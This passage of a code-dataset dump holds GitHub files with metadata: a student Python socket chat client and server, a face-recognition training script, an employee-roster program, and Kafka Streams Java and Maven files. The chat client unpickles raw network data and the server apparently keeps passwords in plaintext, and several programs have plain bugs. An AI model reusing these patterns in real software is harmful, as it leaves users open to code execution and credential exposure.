conn.execute(\"CREATE TABLE IF NOT EXISTS users (username text, password text);\")\n conn.execute(\"CREATE TABLE IF NOT EXISTS groups (type text, contact text, username text);\")\n conn.execute('''CREATE TABLE IF NOT EXISTS massages\n (sender text, private text, sendto text, time time, text text);''')\n\n\ndef main():\n\n create_DB() # if not exist\n listen()\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6302350163459778, "alphanum_fraction": 0.6415444612503052, "avg_line_length": 27.086849212646484, "blob_id": "c4ae39a5218a1d4363d2093005bd67b9ede0a6ff", "content_id": "0cbbc4ac78f51c16c1a69a087da97f7585714af4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11318, "license_type": "no_license", "max_line_length": 185, "num_lines": 403, "path": "/client.py", "repo_name": "shakkedstux/cyber_final_project", "src_encoding": "UTF-8", "text": "# CYBER PROJECT - CLIENT ( VERSION 1.0 ) BY SHAKKED STUX\n\n\nfrom tkinter import *\nimport pickle\nimport socket\nimport select\nimport time\n\n\ndef new_member(member, groupname):\n\n global group, membersList\n\n try: # global may not exist, and mambersList.insert could not exist\n # So - what it is , is : if you are in a 
group page and same group (all of this same in new_massage)\n if group == groupname:\n membersList.insert(END, \", \"+member)\n except:\n pass\n\n\ndef create_group(groupname):\n\n if groupname == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"8\"\n send([massageType, groupname])\n\n\ndef contact_user(username):\n\n if username == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"7\"\n send([massageType, username])\n\n\ndef quit_group_page(groupname):\n\n massageType = \"6\"\n send([massageType, groupname])\n\n\ndef log_out():\n\n massageType = \"5\"\n send([massageType])\n\n create_login_page(\"Fill the form to get in again.\")\n\n\ndef new_massage(massageInfo):\n\n global group, massagesList\n groupname = massageInfo[2]\n sender = massageInfo[0]\n\n try:\n if group == groupname or group == sender:\n massagesList.config(state=\"normal\")\n massagesList.insert(END, massageInfo[0] + \": \" + massageInfo[4])\n massagesList.insert(END, massageInfo[3].split()[1] + \"\\n \\n\")\n massagesList.see(END)\n massagesList.config(state=\"disabled\")\n except:\n pass\n\n\ndef click(evt):\n try:\n w = evt.widget\n index = int(w.curselection()[0])\n value = w.get(index)\n print(value)\n massageType = \"9\"\n send([massageType, value])\n except:\n pass\n\n\ndef create_private_group_page(username, massages):\n\n global frame, group\n group = username\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n top_widgets_frame = Frame(frame, height=50)\n top_widgets_frame.pack_propagate(0)\n Button(top_widgets_frame, text=\"Back\", command = lambda: quit_group_page(username)).pack(side=\"right\", fill=Y)\n Label(top_widgets_frame, text=\" \"+username+\" \").pack(side=\"left\", fill=Y)\n top_widgets_frame.pack(fill=X)\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global massagesList\n massagesList = Text(scrollbarFrame, yscrollcommand = scrollbar.set, cursor=\"arrow\")\n\n\n for massage in massages:\n massagesList.insert(END, massage[0] + \": \" + massage[4])\n massagesList.insert(END, massage[3].split()[1] + \"\\n \\n\")\n\n massagesList.config(state=\"disabled\")\n massagesList.pack(fill=X)\n scrollbar.config(command = massagesList.yview)\n\n massagesList.see(END)\n\n send_massage_frame = Frame(frame, height=\"50\")\n send_massage_frame.pack_propagate(0)\n Button(send_massage_frame, text=\"Send\", command = lambda: [send_massage(username, \"p\", massageEntry.get(\"1.0\",END)), massageEntry.delete('1.0', END)]).pack(fill=BOTH, side=\"right\")\n massageEntry = Text(send_massage_frame, width=\"50\")\n massageEntry.pack(fill=Y, side=\"left\")\n send_massage_frame.pack(fill=X, side=\"bottom\")\n\n scrollbarFrame.pack(fill=BOTH)\n\n\ndef send_massage(groupname, private, msg):\n\n massageType = \"4\"\n send([massageType, groupname, private, msg])\n\n\ndef create_group_page(groupname, massages, members):\n\n global frame, group\n group = groupname\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n top_widgets_frame = Frame(frame, height=50)\n top_widgets_frame.pack_propagate(0)\n\n Button(top_widgets_frame, text=\"Back\", command = lambda: quit_group_page(groupname)).pack(side=\"right\", fill=Y)\n\n Label(top_widgets_frame, text=\" \"+groupname+\" \").pack(side=\"left\", fill=Y)\n\n membersScrollbarFrame = Frame(top_widgets_frame)\n 
scrollbar = Scrollbar(membersScrollbarFrame, orient='horizontal')\n scrollbar.pack(side=\"top\", fill=X)\n\n global membersList\n membersList = Text(membersScrollbarFrame, xscrollcommand = scrollbar.set, cursor=\"arrow\", relief='flat', padx=5)\n membersList.configure(background='SystemButtonFace')\n\n membersList.config(wrap='none')\n membersList.insert(END, \", \".join(members))\n\n membersList.pack(fill=BOTH)\n scrollbar.config(command = membersList.xview)\n\n membersScrollbarFrame.pack(side=\"left\", fill=BOTH)\n top_widgets_frame.pack(fill=X)\n\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global massagesList\n massagesList = Text(scrollbarFrame, yscrollcommand = scrollbar.set, cursor=\"arrow\")\n\n for massage in massages:\n massagesList.insert(END, massage[0] + \": \" + massage[4])\n massagesList.insert(END, massage[3].split()[1] + \"\\n \\n\")\n\n massagesList.config(state=\"disabled\")\n massagesList.pack(fill=X)\n scrollbar.config(command = massagesList.yview)\n\n massagesList.see(END)\n\n send_massage_frame = Frame(frame, height=50)\n send_massage_frame.pack_propagate(0)\n Button(send_massage_frame, text=\"Send\", command = lambda: [send_massage(groupname, \"g\", massageEntry.get(\"1.0\",END)), massageEntry.delete('1.0', END)]).pack(fill=BOTH, side=\"right\")\n massageEntry = Text(send_massage_frame, width=50)\n massageEntry.pack(fill=Y, side=\"left\")\n send_massage_frame.pack(fill=X, side=\"bottom\")\n\n scrollbarFrame.pack(fill=BOTH)\n\n\ndef i_need_groups():\n\n massageType = \"3\"\n send([massageType])\n\n\ndef join_group(groupname):\n\n if groupname == \"\":\n create_join_group_page(\"Field is empty.\")\n else:\n massageType = \"2\"\n send([massageType, groupname])\n\n\ndef create_join_group_page(msg):\n\n global frame\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n button_frame = Frame(frame)\n Button(button_frame, text=\"Back\", command = lambda: i_need_groups()).pack(side=\"left\")\n button_frame.pack(fill=X)\n\n Label(frame, text=msg).pack()\n\n groupnameEntry = Entry(frame)\n groupnameEntry.pack()\n\n Button(frame, text=\"Contact user\", command = lambda: contact_user(groupnameEntry.get())).pack()\n Button(frame, text=\"Join existing group\", command = lambda: join_group(groupnameEntry.get())).pack()\n Button(frame, text=\"Create new group\", command = lambda: create_group(groupnameEntry.get())).pack()\n\n\ndef create_groups_page(groups):\n\n global frame\n frame.destroy()\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n\n buttons_frame = Frame(frame)\n Button(buttons_frame, text=\"Connect to others\", command = lambda: create_join_group_page(\"Enter name of group or user.\")).pack(side=\"right\")\n Button(buttons_frame, text=\"Log Out\", command = lambda: log_out()).pack(side=\"left\")\n buttons_frame.pack(fill=X)\n\n Label(frame, text=\"My contacts:\").pack()\n\n\n scrollbarFrame = Frame(frame)\n scrollbar = Scrollbar(scrollbarFrame)\n scrollbar.pack(side=\"right\", fill=Y)\n\n global groupsList\n groupsList = Listbox(scrollbarFrame, yscrollcommand = scrollbar.set)\n groupsList.bind(\"<<ListboxSelect>>\", click)\n\n for group in groups:\n groupsList.insert(END, group[0])\n\n groupsList.pack(fill=BOTH)\n scrollbar.config(command = groupsList.yview)\n\n scrollbarFrame.pack(fill=BOTH)\n frame.pack()\n\n\ndef create(username, password):\n\n if len(username) == 0 or 
len(password) == 0:\n create_login_page(\"One field [or more] is empty.\")\n else:\n global myName\n myName = username # you can put it at the beginning too, here is more efficient\n massageType = \"0\"\n send([massageType, username, password])\n\n\ndef login(username, password):\n\n global myName\n myName = username # all this in order for the window title to my name\n\n massageType = \"1\"\n send([massageType, username, password])\n\n\ndef create_login_page(msg):\n\n global frame, window\n window.title(\"\")\n try: frame.destroy()\n except: pass\n\n frame = Frame(window, height=300, width=400) # create new page\n frame.pack_propagate(0)\n frame.pack()\n\n Label(frame).pack()\n Label(frame, text=msg).pack()\n\n Label(frame, text=\"Username:\").pack()\n usernameEntry = Entry(frame)\n usernameEntry.pack()\n\n Label(frame, text=\"Password:\").pack()\n passwordEntry = Entry(frame)\n passwordEntry.pack()\n\n Button(frame, text=\"Create user\", command = lambda: create(usernameEntry.get(), passwordEntry.get())).pack()\n Button(frame, text=\"Log in\", command = lambda: login(usernameEntry.get(), passwordEntry.get())).pack()\n\n\ndef send(massage):\n\n massage = pickle.dumps(massage)\n clientSocket.send(massage)\n\n\ndef massage(words):\n\n global window, myName\n massageType = words[0]\n\n if massageType == \"0\": # login fail\n create_login_page(\"No such user. Try again.\")\n\n if massageType == \"1\": # server send groups list\n window.title(myName)\n create_groups_page(words[1])\n\n if massageType == \"2\": # server send massages in a group\n create_group_page(words[1], words[2], words[3])\n\n if massageType == \"3\": # the user you created already exist, or it is a name of a group\n create_login_page(\"Choose different username.\")\n\n if massageType == \"4\": # server send massages in a private group\n create_private_group_page(words[1], words[2])\n\n if massageType == \"5\": # you have just ..\n create_join_group_page(words[1])\n\n if massageType == \"6\": # new massage\n new_massage(words[1])\n\n if massageType == \"7\": # new massage\n new_member(words[1], words[2])\n\n if massageType == \"8\": # new massage\n create_login_page(\"Someone logged in to this account.\")\n\n\ndef listen():\n\n global clientSocket\n clientSocket = socket.socket(socket.SOCK_DGRAM)\n with open(\"connection_details.txt\") as fp:\n lines = fp.read().splitlines()\n serverIp = lines[0].split(\" \")[-1] # last word of first line\n port = lines[1].split(\" \")[-1] # last word of second line\n clientSocket.connect((serverIp,int(port)))\n\n serverIsFine = True\n windowIsOpen = True\n size = 512\n while serverIsFine and windowIsOpen: # while server is still working\n rlist, wlist, xlist = select.select([clientSocket], [clientSocket], [])\n if len(rlist) != 0:\n try:\n msg = b''\n while True:\n x = clientSocket.recv(size)\n msg = msg + x\n if len(x) < size:\n break\n words = pickle.loads(msg)\n massage(words)\n except:\n serverIsFine = False\n\n try:\n window.update()\n except:\n windowIsOpen = False\n\n break_length = 0.2\n time.sleep(break_length)\n\n\ndef main():\n\n global window, frame\n window = Tk()\n window.title(\"\")\n # window.geometry(\"300x240\")\n window.option_add(\"*Font\", (\"Times New Roman\",15))\n create_login_page(\"Welcome! Fill the form to get in.\")\n listen()\n\n\nif __name__ == '__main__':\n main()" } ]
2
abby711/Attendance-System-as-Face-Recognition-using-DL-ML-
https://github.com/abby711/Attendance-System-as-Face-Recognition-using-DL-ML-
710600bac855464e228b38889e5032b1895e1e4a
c1d8ad90d79c91c53b8e6f3dd8a830fb99d22dd6
661bd38394238b4bd8c513727e58037bd35e492c
refs/heads/main
2023-01-30T08:49:55.651942
2020-12-11T18:51:44
2020-12-11T18:51:44
320,643,171
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7462908029556274, "alphanum_fraction": 0.7492581605911255, "avg_line_length": 23.923076629638672, "blob_id": "73a7b36f604e82ede9d6462c25e900192b779216", "content_id": "b28d415519ffb589286598e0fea88918e7319b82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 50, "num_lines": 26, "path": "/day 17-attendance system(dl,ml)/trainingphase.py", "repo_name": "abby711/Attendance-System-as-Face-Recognition-using-DL-ML-", "src_encoding": "UTF-8", "text": "from sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.svm import SVC\r\nimport pickle\r\n\r\nembeddingfile='output/embeddings.pickle'\r\nrecognizerfile='output/recognizer.pickle'\r\nlabelencoderfile='output/le.pickle'\r\n\r\nprint(\"loading the embedded faces\")\r\ndata=pickle.loads(open(embeddingfile,\"rb\").read())\r\n\r\nprint(\"encoding labels\")\r\nlabelenc=LabelEncoder()\r\nlabels=labelenc.fit_transform(data[\"names\"])\r\n\r\nprint(\"Training Model\")\r\nrecog=SVC(C=1.0,kernel=\"linear\",probability=True)\r\nrecog.fit(data[\"embeddings\"],labels)\r\n\r\nf=open(recognizerfile,\"wb\")\r\nf.write(pickle.dumps(recog))\r\nf.close()\r\n\r\nf = open(labelencoderfile, \"wb\")\r\nf.write(pickle.dumps(labelenc))\r\nf.close()\r\n" }, { "alpha_fraction": 0.7924528121948242, "alphanum_fraction": 0.7924528121948242, "avg_line_length": 52, "blob_id": "2d70c063cb4a3e1896ec0a1d8dbae5fb6ca5f8c7", "content_id": "1a80961aa649afcbe27dc04b11820aa1915afd25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/README.md", "repo_name": "abby711/Attendance-System-as-Face-Recognition-using-DL-ML-", "src_encoding": "UTF-8", "text": "## Attendance System as Face Recognition using DL,ML\n" } ]
2
aarnessda/Lab2
https://github.com/aarnessda/Lab2
03e850162b373588a34d61d61faa7e4332639a6c
5518660109635bc7e3c6246d3ad1e72c5e9d361e
25aa86ace254fe5085abec6aa1e9bab49121fe74
refs/heads/master
2016-08-12T08:40:20.443346
2016-02-29T15:47:58
2016-02-29T15:47:58
52,800,640
0
0
null
2016-02-29T15:13:26
2016-02-29T15:13:26
2016-02-29T15:47:58
null
[ { "alpha_fraction": 0.707317054271698, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 40, "blob_id": "9c10260ec9afe9d7b662639b94e3ff8f5f9aa1ac", "content_id": "adc5f29bc5e6253d10be5e09c8dea3b339d4d945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 40, "num_lines": 1, "path": "/README.md", "repo_name": "aarnessda/Lab2", "src_encoding": "UTF-8", "text": "# repository for Lab 2 created by Daniel Aarness\n" }, { "alpha_fraction": 0.5970253944396973, "alphanum_fraction": 0.6064741611480713, "avg_line_length": 35.589744567871094, "blob_id": "d87e23fef2682381c8779a5e6a2d0c281fc68d1e", "content_id": "ea270ef0a46989aab351630b2ccf441e81c4235f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5715, "license_type": "no_license", "max_line_length": 126, "num_lines": 156, "path": "/Program2v1.py", "repo_name": "aarnessda/Lab2", "src_encoding": "UTF-8", "text": "\"\"\"\nDescription: This program will store an employee's SSN in a dictionary\nalong with their age, first name, and last name. This program also has\nthe capability to delete and change employees added to the dictionary.\n\"\"\"\n__author__=\"Daniel Aarness\"\n__date__=\"1/22/16\"\n\ndef checkSSN(tmpssn):\n \"\"\"\n Description: This function checks to see if a SSN is valid.\n Pre-Condition: tmpssn must be a string\n \"\"\"\n if len(tmpssn) == 11:\n if tmpssn[0:3].isdigit() and tmpssn[4:6].isdigit() and tmpssn[7:].isdigit() and tmpssn[3] == '-' and tmpssn[6] == '-':\n return True\n else:\n return False\n else:\n return False\n\ndef createMenu(tmpMenuList):\n \"\"\"\n Description: this function returns a menu\n Pre-Condition: tmpMenuList must have only 5 items\n \"\"\"\n ct = 0\n choicect = 1\n finalMenu = choicect+\")\"+tmpMenuList[ct]\n ct += 1\n choicect += 1\n while ct < len(tmpMenuList):\n for el in tmpMenuList:\n finalMenu += choicect+\")\"+tmpMenuList[ct]+\"\\n\"\n ct+=1\n choicect+=1\n return finalMenu\n\ndef deleteEmp(tmpSSN,empDict):\n \"\"\"\n Description: this function deletes an employee\n Pre-Condition: tmpsss is a string empDict is a dictionary\n \"\"\"\n if tmpSSN in empDict:\n del empDict[tmpSSN]\n return True\n else:\n return False\n\ndef addEmp(tmpSSN,tmpDict,tmpInfo):\n \"\"\"\n Description: this function adds an employee to the dictionary.\n Pre-Condition: tmpSSN is a string, tmpDict is a dictionary, tmpInfo is a list\n \"\"\"\n tmpDict[tmpSSN] = tmpInfo\n return True\n\ndef changeEmp(tmpDict,tmpSSN,tmpAge):\n \"\"\"\n Description: this function edits the age of an employee\n Pre-Condition: tmpDict is a dictionary, tmpSSN is a string, tmpAge is a string\n \"\"\"\n infoList = tmpDict[tmpSSN]\n infoList[-1] = tmpAge\n tmpDict[tmpSSN] = infoList\n\ndef printDict(tmpDict):\n \"\"\"\n Description: this function prints a dictionary\n Pre-Condition: tmpDict is a dictionary\n \"\"\"\n heading = \"{0:11s} {1:15s} {2:15s} {3:3s}\".format(\"SSN\",\"First Name\",\"Last Name\",\"Age\")\n print(heading)\n for k in tmpDict:\n ssn = k\n empList = tmpDict[k]\n fname = empList[0]\n lname = empList[1]\n age = empList[2]\n print(\"{0:11s} {1:15s} {2:15s} {3:3s}\".format(ssn,fname,lname,age))\n#main\n#initialize the dictionary\nempDict = {}\n#choose which 5 variables to put into the menu\nmenuList = [\"Add Employee\",\"Delete Employee\", \"Change Employee\", \"Print Roster\", \"Quit\"]\nmainMenu = createMenu(menuList)\n#print the menu\nprint(mainMenu)\n#ask 
user what they want to do\nuserInp = input(\"Please input a number: \")\nwhile userInp != 5:\n if userInp == 1:\n #ask the user to input an SSN\n empSSN = input(\"Please input the employee's SSN: \")\n if checkSSN(empSSN):\n #initialize the empInfo list\n empInfo = []\n #ask user for necessary info and put info into empInfo list \n fname = input(\"Please input the Employee's first name: \")\n empInfo.append(fname)\n lname = input(\"Please input the Employee's last name: \")\n empInfo.append(lname)\n empAge = input(\"Please input the Employee's age: \")\n empInfo.append(empAge)\n if addEmp(empSSN,empDict,empInfo):\n #after user has been added to dictionary return to main menu\n print(fname, \"has been succesfully added to the database.\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #if SSN is invalid return to main menu\n print(\"ERROR -- invalid SSN -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \") \n elif userInp == 2:\n #ask user for SSN of the employee they wish to delete\n empDel = input(\"Please input the SSN of the employee you wish to delete: \")\n if deleteEmp(empDel,empDict):\n #if SSN is in dictionary delete it and tell user it has been deleted\n print(\"Succesfully Deleted\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \") \n else:\n #if provided ssn is not in the dictionary return to main menu\n print(\"ERROR -- SSN not in database -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n elif userInp == 3:\n #ask user which employee they want to edit\n empChange = input(\"Please input the SSN of the employee you wish to edit: \")\n if empChange in empDict:\n #ask user for updated age\n newAge = input(\"Please input the updated age of the employee: \")\n changeEmp(empDict,empChange,newAge)\n print(\"\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #if ssn not in dictionary return to main menu\n print(\"ERROR -- SSN not in database -- Returning to main menu\\n\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n elif userInp == 4:\n #call printDict function if user enters 4\n printDict(empDict)\n print(\"\\n\")\n #return to main menu after dictionary is printed\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n else:\n #ask user to try again if they do not enter a valid number\n print(\"ERROR -- Please input a valid choice\")\n print(mainMenu)\n userInp = input(\"Please input a number: \")\n#thank user for using a program!!\nprint(\"Thanks for using this program\") \n" } ]
2
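The Program2v1.py listing above (aarnessda/Lab2) reads its menu choice with input(), which returns a string in Python 3, so comparisons such as `while userInp != 5` can never match a number, and createMenu concatenates the integer counter with strings. Below is a minimal sketch of just those two pieces, assuming the same five menu options from the listing; the str()/int() conversions are the adjustment suggested here, and the per-choice dispatch is elided.

```python
# Sketch only: menu plumbing for the employee-roster program listed above.
# Same five options as the original; str()/int() casts are the added fix,
# the body of the dispatch loop is left out.

def create_menu(options):
    """Return the numbered menu as one printable string."""
    return "\n".join(str(i) + ")" + label
                     for i, label in enumerate(options, start=1))


menu_list = ["Add Employee", "Delete Employee", "Change Employee",
             "Print Roster", "Quit"]
print(create_menu(menu_list))

user_inp = int(input("Please input a number: "))   # input() returns str; cast it
while user_inp != 5:
    # ... handle choices 1-4 exactly as in the original loop ...
    user_inp = int(input("Please input a number: "))
print("Thanks for using this program")
```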
itsindranil/neel-kafka-course
https://github.com/itsindranil/neel-kafka-course
2e43b1152fd4319430c1bcddfd9aeb7946e947fa
e5c0ed7f720303619989fe44a9646a17362f5018
6a4a0c5a0466380e60b79e141580298ba3eeed35
refs/heads/master
2023-03-11T05:50:10.814076
2021-02-16T19:37:12
2021-02-16T19:37:12
299,875,299
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7130273580551147, "alphanum_fraction": 0.7209086418151855, "avg_line_length": 42.13999938964844, "blob_id": "0b4c92f8d9c6cdbc2e9bf2974948fa2c5bc099ef", "content_id": "8a15faedc3cfc28e3f9c90906fd3566190bc156a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 113, "num_lines": 50, "path": "/streams-1/src/main/java/com/neel/kafka/streams/StreamsApp1.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.kafka.streams;\n\n\nimport org.apache.kafka.clients.consumer.ConsumerConfig;\nimport org.apache.kafka.common.serialization.Serdes;\nimport org.apache.kafka.streams.KafkaStreams;\nimport org.apache.kafka.streams.KeyValue;\nimport org.apache.kafka.streams.StreamsBuilder;\nimport org.apache.kafka.streams.StreamsConfig;\nimport org.apache.kafka.streams.kstream.*;\nimport org.apache.kafka.streams.state.QueryableStoreType;\nimport org.apache.kafka.streams.state.QueryableStoreTypes;\nimport org.apache.kafka.streams.state.ReadOnlyKeyValueStore;\n\nimport java.util.Properties;\n\npublic class StreamsApp1 {\n public static void main(String[] args) {\n Properties config = new Properties();\n config.setProperty(StreamsConfig.APPLICATION_ID_CONFIG, \"stream-app-1\");\n config.setProperty(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, \"neel-pc:9092\");\n config.setProperty(ConsumerConfig.AUTO_OFFSET_RESET_CONFIG, \"earliest\");\n config.setProperty(StreamsConfig.DEFAULT_KEY_SERDE_CLASS_CONFIG, Serdes.String().getClass().getName());\n config.setProperty(StreamsConfig.DEFAULT_VALUE_SERDE_CLASS_CONFIG, Serdes.String().getClass().getName());\n\n StreamsBuilder builder = new StreamsBuilder();\n\n KStream<String, String> stream1 = builder.stream(\"topic5\");\n // do stuff\n //kStream.to(\"topic-out-kstream\");\n // do stuff\n //table1.toStream().groupByKey().reduce((val1, val2) -> val2).toStream().to(\"topic-out-kstream\");\n KGroupedStream<String, String> grpstream1 = stream1.groupByKey();\n\n KTable<String, Long> outstream = grpstream1.count(Materialized.as(\"cnt\"));\n\n KafkaStreams streams = new KafkaStreams(builder.build(), config);\n streams.start();\n\n ReadOnlyKeyValueStore<String, Long> keyValueStore = streams.store();\n\n System.out.println(\"Count for 1 is \"+ keyValueStore.get(\"1\"));\n // print the topology\n //streams.localThreadsMetadata().forEach(data -> System.out.println(data));\n\n // shutdown hook to correctly close the streams application\n Runtime.getRuntime().addShutdownHook(new Thread(streams::close));\n\n }\n}\n" }, { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 16.600000381469727, "blob_id": "6a2e1cc628a804d4b0ac377f3504aa2f847c7b63", "content_id": "643e159d88afa81517d88e34220217614b46be82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 176, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/App2/src/main/java/com/neel/AssistantCoachService.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\npublic class AssistantCoachService implements AssistantCoach {\n\n\t@Override\n\tpublic String additionalWorkout() {\n\t\treturn \"Proceed to fitness regimen\";\n\t}\n\n}\n" }, { "alpha_fraction": 0.6966745257377625, "alphanum_fraction": 0.6983540654182434, "avg_line_length": 44.10606002807617, "blob_id": 
"b8e7136a158f09dcb9c572f4944adebce73cf3ee", "content_id": "23cdebbf7010d153cebb5d3fe6e166eb7948dd00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2977, "license_type": "no_license", "max_line_length": 134, "num_lines": 66, "path": "/neel-kafka-course/src/main/java/com/neel/kafkacourse/QueryStoreClass.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel.kafkacourse;\n\nimport com.neel.kafkacourse.serde.AppSerdes;\nimport org.apache.kafka.streams.KafkaStreams;\nimport org.apache.kafka.streams.StreamsBuilder;\nimport org.apache.kafka.streams.StreamsConfig;\nimport org.apache.kafka.streams.Topology;\nimport org.apache.kafka.streams.kstream.Consumed;\nimport org.apache.kafka.streams.kstream.KStream;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.util.Properties;\nimport java.util.concurrent.TimeUnit;\n\npublic class QueryStoreClass {\n static Logger logger = LoggerFactory.getLogger(QueryStoreClass.class);\n\n public static void main(String[] args) throws InterruptedException {\n Properties properties = new Properties();\n properties.setProperty(StreamsConfig.APPLICATION_ID_CONFIG, \"streams-app\");\n properties.setProperty(StreamsConfig.BOOTSTRAP_SERVERS_CONFIG, AppConfigs.bootstrapServers);\n properties.setProperty(StreamsConfig.STATE_DIR_CONFIG, AppConfigs.stateStoreLocation);\n properties.setProperty(StreamsConfig.APPLICATION_SERVER_CONFIG, AppConfigs.queryServerHost+ \":\" + AppConfigs.queryServerPort);\n //properties.setProperty(StreamsConfig.DEFAULT_KEY_SERDE_CLASS_CONFIG, AppSerdes.String().getClass().getName());\n //properties.setProperty(StreamsConfig.DEFAULT_VALUE_SERDE_CLASS_CONFIG, AppSerdes.Employees().getClass().getName());\n\n StreamsBuilder builder = new StreamsBuilder();\n //Creating the Stream\n KStream<String, String> KS_AdClick = builder.stream(\"sample-topic\", Consumed.with(AppSerdes.String(), AppSerdes.String()));\n\n // KT_AdInv.toStream().foreach((k, v) -> System.out.println(\"Key: \" + k + \" Value: \" + v));\n Topology topology = builder.build();\n\n KafkaStreams streams = new KafkaStreams(topology, properties);\n logger.info(\"Starting Streams\");\n\n\n QueryServer queryServer = new QueryServer(streams, AppConfigs.queryServerHost, AppConfigs.queryServerPort);\n streams.setStateListener((newState, oldState) -> {\n logger.info(\"State Changing to \" + newState + \" from \" + oldState);\n queryServer.setActive(newState == KafkaStreams.State.RUNNING && oldState == KafkaStreams.State.REBALANCING);\n });\n\n\n streams.start();\n TimeUnit.SECONDS.sleep(10);\n queryServer.start();\n/*\n //Get the key value store\n ReadOnlyKeyValueStore<String, Regions> kvStore = streams.store(\"store-test_kt_join3\", QueryableStoreTypes.keyValueStore());\n\n //Get all values for all keys\n KeyValueIterator<String, Regions> range = kvStore.all();\n while (range.hasNext()) {\n KeyValue<String, Regions> next = range.next();\n logger.info(\"Key: \" + next.key + \" value: \" + next.value);\n }\n*/\n Runtime.getRuntime().addShutdownHook(new Thread(() -> {\n logger.info(\"Shutting Down streams\");\n queryServer.stop();\n streams.close();\n }));\n }\n}\n" }, { "alpha_fraction": 0.7414860725402832, "alphanum_fraction": 0.7430340647697449, "avg_line_length": 25.91666603088379, "blob_id": "5a516bc22629779acbffccaa590eca72dbf908be", "content_id": "1d09e066a6b16541da83b656f9a44515f5431d10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Java", "length_bytes": 646, "license_type": "no_license", "max_line_length": 105, "num_lines": 24, "path": "/App2/src/main/java/com/neel/SpringApp3.java", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "package com.neel;\n\nimport org.springframework.context.support.ClassPathXmlApplicationContext;\n\npublic class SpringApp3 {\n\n\tpublic static void main(String[] args) {\n\t\t\t//load the application context file\n\t\t\tClassPathXmlApplicationContext context = new ClassPathXmlApplicationContext(\"applicationContext.xml\");\n\t\t\t\n\t\t\t//get the bean\n\t\t\tBaseballCoach theCoach = context.getBean(\"myBaseballCoach\", BaseballCoach.class);\n\t\t\t//call the method\n\t\t\tSystem.out.println(theCoach.getDailyWorkout());\n\t\t\t\n\t\t\tSystem.out.println(theCoach.getEmail_address());\n\t\t\t\n\t\t\tSystem.out.println(theCoach.getTeam());\n\t\t\t\n\t\t\t//close the context\n\t\t\tcontext.close();\n\t\t}\n\n\t}\n" }, { "alpha_fraction": 0.5615299344062805, "alphanum_fraction": 0.5762194991111755, "avg_line_length": 32.11009216308594, "blob_id": "1acbce18c77c38e95f7dd8aaa3b3141a2bd1f5a3", "content_id": "4a83817ce9ff74dda1896a5059ed7108f9e95354", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Maven POM", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 205, "num_lines": 109, "path": "/neel-kafka-course/pom.xml", "repo_name": "itsindranil/neel-kafka-course", "src_encoding": "UTF-8", "text": "<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n <groupId>com.neel.kafkacourse</groupId>\n <artifactId>neel-kafka-course</artifactId>\n <version>1.0</version>\n\n <properties>\n <java.vsersion>1.8</java.vsersion>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n\n </properties>\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.maven.plugins</groupId>\n <artifactId>maven-compiler-plugin</artifactId>\n <version>3.8.1</version>\n <configuration>\n <source>${java.version}</source>\n <target>${java.version}</target>\n </configuration>\n </plugin>\n\n <!-- Json Schema to POJO plugin-->\n <plugin>\n 